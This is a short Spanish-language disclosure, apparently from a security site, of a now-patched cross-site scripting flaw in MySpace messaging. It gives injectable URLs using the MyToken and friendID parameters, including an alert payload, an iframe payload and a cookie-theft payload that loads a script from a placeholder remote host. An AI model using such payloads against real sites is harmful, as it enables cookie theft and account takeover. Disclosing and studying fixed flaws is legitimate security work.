Ha sido corregida
XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG
Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.
Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> "> o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.
Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG
Imagen inyección
XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1
ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1
Fuente http://sni-labs.com